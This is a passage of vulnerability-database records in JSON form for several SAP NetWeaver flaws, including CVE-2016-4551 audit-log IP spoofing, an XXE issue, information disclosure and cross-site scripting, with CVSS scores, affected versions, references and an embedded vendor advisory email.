"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "2004s"
},
{
"model": "aba",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.00"
},
{
"model": "basis",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.00"
},
{
"model": "aba",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.00 sp level 0031"
},
{
"model": "basis",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.00 sp level 0031"
},
{
"model": "security audit log",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "93288"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005169"
},
{
"db": "NVD",
"id": "CVE-2016-4551"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-111"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:sap_basis:7.00:sp_level_0031:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:2004s:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:sap_aba:7.00:sp_level_0031:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-4551"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sergio Abraham.",
"sources": [
{
"db": "BID",
"id": "93288"
}
],
"trust": 0.3
},
"cve": "CVE-2016-4551",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2016-4551",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2016-4551",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-4551",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201610-111",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005169"
},
{
"db": "NVD",
"id": "CVE-2016-4551"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-111"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The (1) SAP_BASIS and (2) SAP_ABA components 7.00 SP Level 0031 in SAP NetWeaver 2004s might allow remote attackers to spoof IP addresses written to the Security Audit Log via vectors related to the network landscape, aka SAP Security Note 2190621. Vendors have confirmed this vulnerability SAP Security Note 2190621 It is released as. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. \nAttackers can exploit this issue to bypass security restrictions to perform unauthorized actions; this may aid in launching further attacks. Impact on Business\n=====================\nBy exploiting this vulnerability an attacker could tamper the audit logs, hiding his trails after an attack to a SAP system. \n\nRisk Level: High\n\n2. Advisory Information\n=======================\n- Public Release Date: 09/22/2016\n- Last Revised: 09/22/2016\n- Security Advisory ID: ONAPSIS-2016-036\n- Onapsis SVS ID: ONAPSIS-00144\n- CVE: CVE-2016-4551\n- Researcher: Sergio Abraham\n- Vendor Provided CVSS v2: 3.5 (AV:N/AC:M/Au:S/C:N/I:P/A:N)\n- Onapsis CVSS v2: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n3. Vulnerability Information\n============================\n- Vendor: SAP AG\n- Affected Components: SAP NetWeaver 2004s\n\tSAP_BASIS 7.00 SP Level 0031 SAPKB70031\n\tSAP_ABA 7.00 SP level 0031 SAPKA70031\n- Vulnerability Class: Insufficient Logging (CWE-778)\n- Remotely Exploitable: Yes \n- Locally Exploitable: No\n- Authentication Required: No\n- Original Advisory: https://www.onapsis.com/research/security-advisories/sap-security-audit-log-invalid-address-logging\n\n4. \n\n5. \n\n6. \n\n7. Report Timeline\n==================\n- 11/07/2014: Onapsis provides vulnerability information to SAP AG. \n- 09/22/2016: Onapsis Releases Security Advisory. \n\n\nAbout Onapsis Research Labs\n===========================\nOnapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. \n\nAbout Onapsis, Inc. \n===================\nOnapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications. \n\nHeadquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E\u0026Y, KPMG and PwC. \n\nOnapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs. \n\nThese solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms. \n\nFor more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn. \n\n\n\n-- \nThis email and any files transmitted with it are confidential and intended \nsolely for the use of the individual or entity to whom they are addressed. \nIf you have received this email in error please notify the system manager. \nThis message contains confidential information and is intended only for the \nindividual named. If you are not the named addressee you should not \ndisseminate, distribute or copy this e-mail. \nPlease notify the sender immediately by e-mail if you have received this \ne-mail by mistake and delete this e-mail from your system. If you are not \nthe intended recipient you are notified that disclosing, copying, \ndistributing or taking any action in reliance on the contents of this \ninformation is strictly prohibited",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-4551"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005169"
},
{
"db": "BID",
"id": "93288"
},
{
"db": "PACKETSTORM",
"id": "138953"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-4551",
"trust": 2.8
},
{
"db": "BID",
"id": "93288",
"trust": 1.3
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005169",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "138953",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201610-111",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "93288"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005169"
},
{
"db": "PACKETSTORM",
"id": "138953"
},
{
"db": "NVD",
"id": "CVE-2016-4551"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-111"
}
]
},
"id": "VAR-201610-0311",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:03:13.223000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2190621",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
},
{
"title": "SAP Netweaver 2004s SAP_BASIS and SAP_ABA Fixes for component security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=64537"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005169"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-111"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-284",
"trust": 1.0
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005169"
},
{
"db": "NVD",
"id": "CVE-2016-4551"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.7,
"url": "http://seclists.org/fulldisclosure/2016/oct/3"
},
{
"trust": 1.7,
"url": "https://www.onapsis.com/research/security-advisories/sap-security-audit-log-invalid-address-logging"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/93288"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-4551"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-4551"
},
{
"trust": 0.8,
"url": "https://www.onapsis.com/blog/analyzing-sap-security-notes-december-2015"
},
{
"trust": 0.6,
"url": "http://packetstormsecurity.com/files/138953/sap-netweaver-2004s-invalid-address-logging.html"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.1,
"url": "https://www.onapsis.com,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4551"
}
],
"sources": [
{
"db": "BID",
"id": "93288"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005169"
},
{
"db": "PACKETSTORM",
"id": "138953"
},
{
"db": "NVD",
"id": "CVE-2016-4551"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-111"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "93288"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005169"
},
{
"db": "PACKETSTORM",
"id": "138953"
},
{
"db": "NVD",
"id": "CVE-2016-4551"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-111"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-10-03T00:00:00",
"db": "BID",
"id": "93288"
},
{
"date": "2016-10-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-005169"
},
{
"date": "2016-10-03T23:44:44",
"db": "PACKETSTORM",
"id": "138953"
},
{
"date": "2016-10-05T16:59:02.757000",
"db": "NVD",
"id": "CVE-2016-4551"
},
{
"date": "2016-10-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201610-111"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-10-10T00:02:00",
"db": "BID",
"id": "93288"
},
{
"date": "2016-10-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-005169"
},
{
"date": "2016-11-28T20:18:50.680000",
"db": "NVD",
"id": "CVE-2016-4551"
},
{
"date": "2016-10-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201610-111"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201610-111"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver of SAP_BASIS and SAP_ABA In the component Security Audit Written in the log IP Address spoofing vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005169"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201610-111"
}
],
"trust": 0.6
}
}
var-201705-4223
Vulnerability from variot
SAP NetWeaver is prone to an XML External Entity injection vulnerability. Attackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201705-4223",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "98354"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "98354"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an XML External Entity injection vulnerability.\nAttackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions.",
"sources": [
{
"db": "BID",
"id": "98354"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "98354",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "98354"
}
]
},
"id": "VAR-201705-4223",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:47:54.165000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2406918"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/05/09/sap-security-patch-day-may-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "98354"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "98354"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-05-09T00:00:00",
"db": "BID",
"id": "98354"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-05-23T16:23:00",
"db": "BID",
"id": "98354"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "98354"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver XML External Entity Injection Vulnerability",
"sources": [
{
"db": "BID",
"id": "98354"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "98354"
}
],
"trust": 0.3
}
}
var-201711-1258
Vulnerability from variot
SAP NetWeaver is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201711-1258",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "101825"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported the issue.",
"sources": [
{
"db": "BID",
"id": "101825"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an information-disclosure vulnerability.\nAttackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.",
"sources": [
{
"db": "BID",
"id": "101825"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "101825",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "101825"
}
]
},
"id": "VAR-201711-1258",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:36:22.208000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2493171\t"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/11/14/sap-security-patch-day-november-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "101825"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "101825"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-11-14T00:00:00",
"db": "BID",
"id": "101825"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-19T22:36:00",
"db": "BID",
"id": "101825"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "101825"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Instance Agent Service Information Disclosure Vulnerability",
"sources": [
{
"db": "BID",
"id": "101825"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "101825"
}
],
"trust": 0.3
}
}
var-201311-0362
Vulnerability from variot
Multiple cross-site scripting (XSS) vulnerabilities in the (1) JavaDumpService and (2) DataCollector servlets in SAP NetWeaver allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Since some unknown input related to the JavaDumpService servlet and the DataCollector servlet is not properly filtered before being returned to the user, the attacker can exploit the vulnerability to execute arbitrary HTML and script code in the user's browser session of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201311-0362",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": null,
"trust": 1.4,
"vendor": "sap",
